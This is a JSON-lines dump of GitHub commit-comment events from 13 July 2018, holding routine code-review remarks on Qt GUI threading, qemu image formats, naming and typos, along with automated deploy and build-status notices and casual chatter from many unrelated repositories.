{"id":"7962232856","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29700073,"position":44,"line":136,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"d0f90ea9f566a2d29432e4cb9f4f669114083e50","created_at":"2018-07-13T13:41:54Z","updated_at":"2018-07-13T13:41:54Z","author_association":"OWNER","body":"This did not work. It froze the gui.\r\n(lines 138 to 140 were commented too)"}},"created_at":"2018-07-13T13:41:54Z"}
{"id":"7962232915","type":"CommitCommentEvent","actor":{"login":"cadegenn"},"repo":{"name":"cadegenn/pwsh_fw"},"payload":{"comment":{"id":29700074,"position":null,"line":null,"path":null,"commit_id":"02f8284c7ebe38d593c4acbc093c0debe50da96f","created_at":"2018-07-13T13:41:55Z","updated_at":"2018-07-13T13:41:55Z","author_association":"OWNER","body":"for issue #16 "}},"created_at":"2018-07-13T13:41:55Z"}
{"id":"7962233597","type":"CommitCommentEvent","actor":{"login":"clason"},"repo":{"name":"ncm2/ncm2"},"payload":{"comment":{"id":29700077,"position":17,"line":82,"path":"autoload/ncm2.vim","commit_id":"22d80bc0b93c942eeb07d9c5cbd2ae6927d3cd64","created_at":"2018-07-13T13:42:03Z","updated_at":"2018-07-13T13:42:03Z","author_association":"NONE","body":"Also, typo: `uesr` :smiley: (Doesn't change the problem below, though.)"}},"created_at":"2018-07-13T13:42:03Z"}
{"id":"7962234662","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29700081,"position":null,"line":null,"path":null,"commit_id":"df614d3bd83b19f96ae9d10b4d19600608ea617a","created_at":"2018-07-13T13:42:15Z","updated_at":"2018-07-13T13:42:15Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-134214 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-134214\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T13:42:15Z"}
{"id":"7962237674","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29700090,"position":30,"line":32,"path":"src/test/java/ml/duncte123/skybot/SkybotMainTest.java","commit_id":"91aefb818ef5d3b31e382fe4abf4d2076030430c","created_at":"2018-07-13T13:42:50Z","updated_at":"2018-07-13T13:42:50Z","author_association":"MEMBER","body":"Actually it fails if no value is set."}},"created_at":"2018-07-13T13:42:50Z"}
{"id":"7962240323","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29700104,"position":30,"line":32,"path":"src/test/java/ml/duncte123/skybot/SkybotMainTest.java","commit_id":"91aefb818ef5d3b31e382fe4abf4d2076030430c","created_at":"2018-07-13T13:43:21Z","updated_at":"2018-07-13T13:43:21Z","author_association":"MEMBER","body":"Lol I'm blind"}},"created_at":"2018-07-13T13:43:21Z"}
{"id":"7962241456","type":"CommitCommentEvent","actor":{"login":"Monal5031"},"repo":{"name":"iiitv/Odyssy"},"payload":{"comment":{"id":29700109,"position":2,"line":2,"path":"wsgi/odyssy/basic/static/basic/js/secret.js","commit_id":"9a397e4427ce4b6e13eff9b2f79e55f315864237","created_at":"2018-07-13T13:43:34Z","updated_at":"2018-07-13T13:43:34Z","author_association":"MEMBER","body":":joy: @mohitkyadav "}},"created_at":"2018-07-13T13:43:34Z"}
{"id":"7962242714","type":"CommitCommentEvent","actor":{"login":"cgwalters"},"repo":{"name":"arithx/mantle"},"payload":{"comment":{"id":29700114,"position":26,"line":301,"path":"platform/machine/qemu/cluster.go","commit_id":"390f50a16cf6a1ce85773afd9710ffc3f25c248a","created_at":"2018-07-13T13:43:48Z","updated_at":"2018-07-13T13:43:48Z","author_association":"NONE","body":"Why?  The qcow2 format is just better than raw.\r\n\r\nAs far as `qcow` vs `qcow2`...yes...but there's no reason to ship `qcow` today.\r\n\r\nWait a second, `qemu-img` today will auto-detect the format:\r\n\r\n```\r\n    drvname = qdict_get_try_str(options, \"driver\");\r\n    if (drvname) {\r\n        drv = bdrv_find_format(drvname);\r\n```\r\n\r\nSo why not just stop passing `backing_fmt`?"}},"created_at":"2018-07-13T13:43:48Z"}
{"id":"7962256556","type":"CommitCommentEvent","actor":{"login":"ggreif"},"repo":{"name":"turion/rhine"},"payload":{"comment":{"id":29700160,"position":9,"line":39,"path":"rhine/src/FRP/Rhine/Clock/Realtime/Stdin.hs","commit_id":"416b5c1a02a72297da53bac9c64aafed13e43180","created_at":"2018-07-13T13:46:25Z","updated_at":"2018-07-13T13:46:25Z","author_association":"CONTRIBUTOR","body":"`arrM_ $ liftIO $ flip (,) <$> getLine <*> getCurrentTime`  Just a suggestion :-P"}},"created_at":"2018-07-13T13:46:25Z"}
{"id":"7962259445","type":"CommitCommentEvent","actor":{"login":"yolofreak12"},"repo":{"name":"yolofreak12/maker"},"payload":{"comment":{"id":29700167,"position":null,"line":null,"path":null,"commit_id":"241512699c1af6e24d917f48db25f3536405b52a","created_at":"2018-07-13T13:46:59Z","updated_at":"2018-07-13T13:46:59Z","author_association":"OWNER","body":"welkom in de server volvrede"}},"created_at":"2018-07-13T13:46:59Z"}
{"id":"7962263457","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29700181,"position":30,"line":32,"path":"src/test/java/ml/duncte123/skybot/SkybotMainTest.java","commit_id":"91aefb818ef5d3b31e382fe4abf4d2076030430c","created_at":"2018-07-13T13:47:45Z","updated_at":"2018-07-13T13:47:45Z","author_association":"MEMBER","body":"You are still my friend"}},"created_at":"2018-07-13T13:47:45Z"}
{"id":"7962264381","type":"CommitCommentEvent","actor":{"login":"nmat"},"repo":{"name":"sous-chefs/language-chef"},"payload":{"comment":{"id":29700185,"position":9,"line":96,"path":"data/chef-recipes.json","commit_id":"ab46097fec3a5bad4d06a4139fbe1f02f79fd22b","created_at":"2018-07-13T13:47:55Z","updated_at":"2018-07-13T13:47:55Z","author_association":"NONE","body":"Is conig_key correct here? shouldn't it be config_key?"}},"created_at":"2018-07-13T13:47:55Z"}
{"id":"7962266637","type":"CommitCommentEvent","actor":{"login":"HilalAkgul"},"repo":{"name":"HilalAkgul/github-13"},"payload":{"comment":{"id":29700192,"position":4,"line":32,"path":"github-13/Views/Home/Index.cshtml","commit_id":"6e081e10053a383ca2a7e92973609c17aebf1d69","created_at":"2018-07-13T13:48:21Z","updated_at":"2018-07-13T13:48:21Z","author_association":"OWNER","body":"güzel olmuş \r\n"}},"created_at":"2018-07-13T13:48:21Z"}
{"id":"7962269621","type":"CommitCommentEvent","actor":{"login":"MClausz"},"repo":{"name":"Akarin-project/Akarin"},"payload":{"comment":{"id":29700202,"position":null,"line":null,"path":null,"commit_id":"9cfe108024429008ef3a709ca4c4dffd11a2101d","created_at":"2018-07-13T13:48:54Z","updated_at":"2018-07-13T13:48:54Z","author_association":"NONE","body":"These 2 map, collection needs to be concurrent:\r\nMap<Integer, Set<AttributeModifier>> c in AttributeModifiable\r\nSet<AttributeInstance> e in AttributeMapServer"}},"created_at":"2018-07-13T13:48:54Z"}
{"id":"7962275083","type":"CommitCommentEvent","actor":{"login":"wvict"},"repo":{"name":"wvict/notes"},"payload":{"comment":{"id":29700226,"position":null,"line":null,"path":null,"commit_id":"e0ee3127d7edd5de771550b8b8e2a499cb55771e","created_at":"2018-07-13T13:49:56Z","updated_at":"2018-07-13T13:49:56Z","author_association":"OWNER","body":"I also remove the animation of the div-note class."}},"created_at":"2018-07-13T13:49:56Z"}
{"id":"7962275745","type":"CommitCommentEvent","actor":{"login":"AndreLesa"},"repo":{"name":"BlueCodeSystems/nacmis"},"payload":{"comment":{"id":29700228,"position":null,"line":null,"path":null,"commit_id":"64f3e2132e7b1a1397b6ae35dc1fa9ddd319de8d","created_at":"2018-07-13T13:50:03Z","updated_at":"2018-07-13T13:50:03Z","author_association":"CONTRIBUTOR","body":"For issues: #291  and #281 "}},"created_at":"2018-07-13T13:50:03Z"}
{"id":"7962277706","type":"CommitCommentEvent","actor":{"login":"rramo012"},"repo":{"name":"BoldGrid/library"},"payload":{"comment":{"id":29700233,"position":35,"line":384,"path":"src/Library/License.php","commit_id":"fb13acd97511d1981ad51eafb93d0c3fa32f69d4","created_at":"2018-07-13T13:50:24Z","updated_at":"2018-07-13T13:50:24Z","author_association":"MEMBER","body":"This is an undefined variable, function will always return false"}},"created_at":"2018-07-13T13:50:24Z"}
{"id":"7962277828","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"dsh2dsh/OGSR-Engine"},"payload":{"comment":{"id":29700234,"position":null,"line":null,"path":null,"commit_id":"de7ff0c41bf7821f03bcd01b4003593a412705a7","created_at":"2018-07-13T13:50:25Z","updated_at":"2018-07-13T13:50:25Z","author_association":"OWNER","body":"Нет, не нужен. Но ты погоди, я ещё поиграю и замержу завтра-послезавтра. "}},"created_at":"2018-07-13T13:50:25Z"}
{"id":"7962280841","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"fjuma/wildfly-elytron"},"payload":{"comment":{"id":29700242,"position":75,"line":75,"path":"src/test/java/org/wildfly/security/x500/cert/acme/AcmeClientSpiTest.java","commit_id":"d221cec97a20c20f9a259594789e133091bb6667","created_at":"2018-07-13T13:50:57Z","updated_at":"2018-07-13T13:50:57Z","author_association":"OWNER","body":"After responding to Let's Encrypt's challenge, the client needs to poll Let's Encrypt to check if it has successfully validated the challenge. It's supposed to wait a bit in between polling. The default is currently set to 3 seconds. It seems to take a bit of time before the mock server validates the mock client in the tests. I'll see if I can tweak this."}},"created_at":"2018-07-13T13:50:57Z"}
{"id":"7962282967","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29700250,"position":null,"line":null,"path":null,"commit_id":"3ad92f6564160b6cdedf4ce5eb10de3fea90e597","created_at":"2018-07-13T13:51:21Z","updated_at":"2018-07-13T13:51:21Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-13T13:51:21Z"}
{"id":"7962283344","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"fjuma/wildfly-core"},"payload":{"comment":{"id":29700252,"position":56,"line":89,"path":"elytron/src/test/java/org/wildfly/extension/elytron/KeyStoresTestCase.java","commit_id":"080336cffe73c28ac4d69dc81ae9d613d8904132","created_at":"2018-07-13T13:51:25Z","updated_at":"2018-07-13T13:51:25Z","author_association":"OWNER","body":"Same thing happens here, i.e., after responding to Let's Encrypt's challenge, the client needs to poll Let's Encrypt to check if it has successfully validated the challenge. It's supposed to wait a bit in between polling. The default is currently set to 3 seconds. It seems to take a bit of time before the mock server validates the mock client in the tests. I'll see if I can tweak this."}},"created_at":"2018-07-13T13:51:25Z"}
{"id":"7962285591","type":"CommitCommentEvent","actor":{"login":"franci22"},"repo":{"name":"franci22/BNoteBot"},"payload":{"comment":{"id":29700258,"position":null,"line":null,"path":null,"commit_id":"8952820d8b69e5a220c638aa418321cc628a5887","created_at":"2018-07-13T13:51:49Z","updated_at":"2018-07-13T13:51:49Z","author_association":"OWNER","body":"After this update, it's necessary to enable /setinlinefeedback using BotFather."}},"created_at":"2018-07-13T13:51:49Z"}
{"id":"7962290002","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29700271,"position":null,"line":null,"path":null,"commit_id":"0d772e2992138c820c793b125d4b735138aba8d6","created_at":"2018-07-13T13:52:37Z","updated_at":"2018-07-13T13:52:37Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1687 of 1687 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-13T13:52:37Z"}
{"id":"7962293412","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29700274,"position":51,"line":357,"path":"gui/CMainWindow.cpp","commit_id":"6931b825544acca912e0298e8c373a756cb6d37c","created_at":"2018-07-13T13:53:15Z","updated_at":"2018-07-13T13:53:15Z","author_association":"OWNER","body":"@EduFdez This launches the thread properly, the textbrowser gets updated in real time. But once the thread finishes, accessing the gui causes a crash.\r\n\r\n```\r\nQObject::connect: Cannot queue arguments of type 'QTextCursor'\r\n(Make sure 'QTextCursor' is registered using qRegisterMetaType().)\r\n```\r\nI [looked](https://stackoverflow.com/questions/2104779/qobject-qplaintextedit-multithreading-issues) it up and it seems like the gui should be updated only from the main thread.\r\n\r\nThe culprit here in this case would be publishText, which writes to the textbrowser through [CTextObserver](https://github.com/karnikram/autocalib-sensor-extrinsics/blob/6931b825544acca912e0298e8c373a756cb6d37c/gui/viewer/CViewerContainer.cpp#L160)."}},"created_at":"2018-07-13T13:53:15Z"}
{"id":"7962296154","type":"CommitCommentEvent","actor":{"login":"Vinexbr"},"repo":{"name":"Vinexbr/vynex"},"payload":{"comment":{"id":29700285,"position":2,"line":2,"path":"README.md","commit_id":"8ad6cfb1b305674702773b1335d71ca3ca598112","created_at":"2018-07-13T13:53:43Z","updated_at":"2018-07-13T13:53:43Z","author_association":"OWNER","body":"Testando 13-07"}},"created_at":"2018-07-13T13:53:43Z"}
{"id":"7962296575","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29700287,"position":null,"line":null,"path":null,"commit_id":"0812b1fbdfcfcab17f0ba5ed0e274bbf7f57bde4","created_at":"2018-07-13T13:53:49Z","updated_at":"2018-07-13T13:53:49Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180713-135348 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180713-135348\") to [dev](https://console.bluemix.net/apps/182ee02c-2a02-463d-8000-b8fc1c5b2409?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-13T13:53:49Z"}
{"id":"7962296582","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29700288,"position":44,"line":136,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"6931b825544acca912e0298e8c373a756cb6d37c","created_at":"2018-07-13T13:53:49Z","updated_at":"2018-07-13T13:53:49Z","author_association":"OWNER","body":"@EduFdez This still freezes the gui."}},"created_at":"2018-07-13T13:53:49Z"}
{"id":"7962301954","type":"CommitCommentEvent","actor":{"login":"reusspaul"},"repo":{"name":"reusspaul/NAO"},"payload":{"comment":{"id":29700298,"position":null,"line":null,"path":null,"commit_id":"5264412a477cea33f76892d78f74c2a6b733d1f0","created_at":"2018-07-13T13:54:47Z","updated_at":"2018-07-13T13:54:47Z","author_association":"OWNER","body":"\"NAO\" est un ensemble de logiciels pédagogiques sur la neutronique et de notices associées.\r\nCe produit permet un apprentissage approfondi de cette branche de la physique des réacteurs."}},"created_at":"2018-07-13T13:54:47Z"}
{"id":"7962302903","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29700301,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-13T13:54:57Z","updated_at":"2018-07-13T13:54:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T13:54:57Z"}
{"id":"7962303975","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29700304,"position":null,"line":null,"path":null,"commit_id":"7f4f19e6c56b6ab9b8e932255c0a50f2211d3b02","created_at":"2018-07-13T13:55:10Z","updated_at":"2018-07-13T13:55:10Z","author_association":"CONTRIBUTOR","body":"Huh, I thought I copied the commands to my shell and had to make that change to get it to work. I'll see if I can recreate what happened later today."}},"created_at":"2018-07-13T13:55:10Z"}
{"id":"7962304443","type":"CommitCommentEvent","actor":{"login":"arithx"},"repo":{"name":"arithx/mantle"},"payload":{"comment":{"id":29700307,"position":26,"line":301,"path":"platform/machine/qemu/cluster.go","commit_id":"390f50a16cf6a1ce85773afd9710ffc3f25c248a","created_at":"2018-07-13T13:55:15Z","updated_at":"2018-07-13T13:55:15Z","author_association":"OWNER","body":"In testing it does look like dropping `backing_fmt` works on both RHCOS & CL. I'll force push to switch to that."}},"created_at":"2018-07-13T13:55:15Z"}
{"id":"7962304869","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29700308,"position":null,"line":null,"path":null,"commit_id":"8b878fe6c4c94c006980581e4f8108667541b57b","created_at":"2018-07-13T13:55:19Z","updated_at":"2018-07-13T13:55:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-135518 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-135518\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T13:55:19Z"}
{"id":"7962305923","type":"CommitCommentEvent","actor":{"login":"ramnes"},"repo":{"name":"Shir0kamii/graphitesender"},"payload":{"comment":{"id":29700313,"position":null,"line":null,"path":null,"commit_id":"46e967cc887c1daaf0a1399474bad8641d8e9c46","created_at":"2018-07-13T13:55:30Z","updated_at":"2018-07-13T13:55:30Z","author_association":"NONE","body":"lol"}},"created_at":"2018-07-13T13:55:30Z"}
{"id":"7962311090","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29700320,"position":44,"line":136,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"d0f90ea9f566a2d29432e4cb9f4f669114083e50","created_at":"2018-07-13T13:56:27Z","updated_at":"2018-07-13T13:56:27Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-13T13:56:27Z"}
{"id":"7962319212","type":"CommitCommentEvent","actor":{"login":"seanos11"},"repo":{"name":"cloudfoundry/docs-cfcr"},"payload":{"comment":{"id":29700333,"position":null,"line":null,"path":null,"commit_id":"6ba7c4f0c8ec4e55b94d1119fd366e52a57a5477","created_at":"2018-07-13T13:57:52Z","updated_at":"2018-07-13T13:57:52Z","author_association":"CONTRIBUTOR","body":"please hold on merging this until we get more feedback from the similar notice sent via emial"}},"created_at":"2018-07-13T13:57:52Z"}
{"id":"7962321410","type":"CommitCommentEvent","actor":{"login":"SpectrixOfficial"},"repo":{"name":"SpectrumDevs/SpectrumDevs.github.io"},"payload":{"comment":{"id":29700349,"position":null,"line":null,"path":null,"commit_id":"83502130ebacc8db9ff22890a248107bff59567b","created_at":"2018-07-13T13:58:16Z","updated_at":"2018-07-13T13:58:16Z","author_association":"CONTRIBUTOR","body":"### **_OOF that hurts_**"}},"created_at":"2018-07-13T13:58:16Z"}
{"id":"7962322626","type":"CommitCommentEvent","actor":{"login":"hazalcalisir"},"repo":{"name":"HilalAkgul/github-13"},"payload":{"comment":{"id":29700350,"position":null,"line":null,"path":null,"commit_id":"6e081e10053a383ca2a7e92973609c17aebf1d69","created_at":"2018-07-13T13:58:29Z","updated_at":"2018-07-13T13:58:29Z","author_association":"COLLABORATOR","body":"nie sildinkiiii"}},"created_at":"2018-07-13T13:58:29Z"}
{"id":"7962324490","type":"CommitCommentEvent","actor":{"login":"seanos11"},"repo":{"name":"cloudfoundry/docs-cfcr"},"payload":{"comment":{"id":29700353,"position":null,"line":null,"path":null,"commit_id":"6ba7c4f0c8ec4e55b94d1119fd366e52a57a5477","created_at":"2018-07-13T13:58:47Z","updated_at":"2018-07-13T13:58:47Z","author_association":"CONTRIBUTOR","body":"ah, it is already merged. no big deal."}},"created_at":"2018-07-13T13:58:47Z"}
{"id":"7962325246","type":"CommitCommentEvent","actor":{"login":"ginkomix"},"repo":{"name":"emkurilenko/testJS"},"payload":{"comment":{"id":29700360,"position":21,"line":21,"path":"js/arrayTool.js","commit_id":"aa5516f2502274adbae15cdc256e4a27b190bdbe","created_at":"2018-07-13T13:58:55Z","updated_at":"2018-07-13T13:58:55Z","author_association":"NONE","body":"Ты же на шарпе писал"}},"created_at":"2018-07-13T13:58:55Z"}
{"id":"7962327780","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29700368,"position":null,"line":null,"path":null,"commit_id":"378755ca695682d54f9719670727aaef01d852f3","created_at":"2018-07-13T13:59:22Z","updated_at":"2018-07-13T13:59:22Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-378755ca695682d54f9719670727aaef01d852f3-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-378755ca695682d54f9719670727aaef01d852f3-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T13:59:22Z"}
{"id":"7962331333","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29700374,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-13T14:00:00Z","updated_at":"2018-07-13T14:00:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T14:00:00Z"}
{"id":"7962335457","type":"CommitCommentEvent","actor":{"login":"tungtd95"},"repo":{"name":"buivancuong/ToDoListAppDemo"},"payload":{"comment":{"id":29700385,"position":27,"line":27,"path":"app/src/main/java/com/umbala/cuongbv/to_dolistappdemo/MainActivity.java","commit_id":"b11a92237304c53d1a6c92a55f9510f1d7329518","created_at":"2018-07-13T14:00:41Z","updated_at":"2018-07-13T14:00:41Z","author_association":"NONE","body":"chưa khởi tạo biến allTask mà đã đòi allTask.getAlltask() thì ăn Null Pointer Exception chắc rồi. Die app ở đoạn này nhá!"}},"created_at":"2018-07-13T14:00:41Z"}
{"id":"7962343546","type":"CommitCommentEvent","actor":{"login":"grandinj"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":29700404,"position":11,"line":417,"path":"h2/src/main/org/h2/expression/Operation.java","commit_id":"e647b73b8397f700eced48cbdb2f677b73024810","created_at":"2018-07-13T14:02:06Z","updated_at":"2018-07-13T14:02:06Z","author_association":"CONTRIBUTOR","body":"rather use getLHS and getRHS, otherwise very hard to read the caller code"}},"created_at":"2018-07-13T14:02:06Z"}
{"id":"7962343673","type":"CommitCommentEvent","actor":{"login":"awesomecoder466"},"repo":{"name":"foodguys/Fix-Websites-Project"},"payload":{"comment":{"id":29700405,"position":4,"line":4,"path":"README.md","commit_id":"7319736358aa2b84e7c13eea8db559dca9ef4e82","created_at":"2018-07-13T14:02:07Z","updated_at":"2018-07-13T14:02:07Z","author_association":"CONTRIBUTOR","body":"hi there we will be showing the best restraunts in texas\r\n"}},"created_at":"2018-07-13T14:02:07Z"}
{"id":"7962345968","type":"CommitCommentEvent","actor":{"login":"jlblancoc"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29700408,"position":51,"line":357,"path":"gui/CMainWindow.cpp","commit_id":"6931b825544acca912e0298e8c373a756cb6d37c","created_at":"2018-07-13T14:02:31Z","updated_at":"2018-07-13T14:02:31Z","author_association":"NONE","body":"Yes, most (all?) GUIs doesn't allow changing the GUI from a different\nthread.\n\nBut that doesn't mean that it cannot be done: Qt provides this mechanism\n(slots & signals):\nhttps://stackoverflow.com/a/2104992/1631514\n"}},"created_at":"2018-07-13T14:02:31Z"}
{"id":"7962346018","type":"CommitCommentEvent","actor":{"login":"grandinj"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":29700409,"position":9,"line":106,"path":"h2/src/main/org/h2/expression/ConditionNot.java","commit_id":"e647b73b8397f700eced48cbdb2f677b73024810","created_at":"2018-07-13T14:02:31Z","updated_at":"2018-07-13T14:02:31Z","author_association":"CONTRIBUTOR","body":"rather call this getSubCondition or getSubExpression"}},"created_at":"2018-07-13T14:02:31Z"}
{"id":"7962349334","type":"CommitCommentEvent","actor":{"login":"grandinj"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":29700417,"position":31,"line":503,"path":"h2/src/main/org/h2/command/dml/Query.java","commit_id":"e647b73b8397f700eced48cbdb2f677b73024810","created_at":"2018-07-13T14:03:09Z","updated_at":"2018-07-13T14:03:09Z","author_association":"CONTRIBUTOR","body":"a comment as to the purpose of this method would be nice"}},"created_at":"2018-07-13T14:03:09Z"}
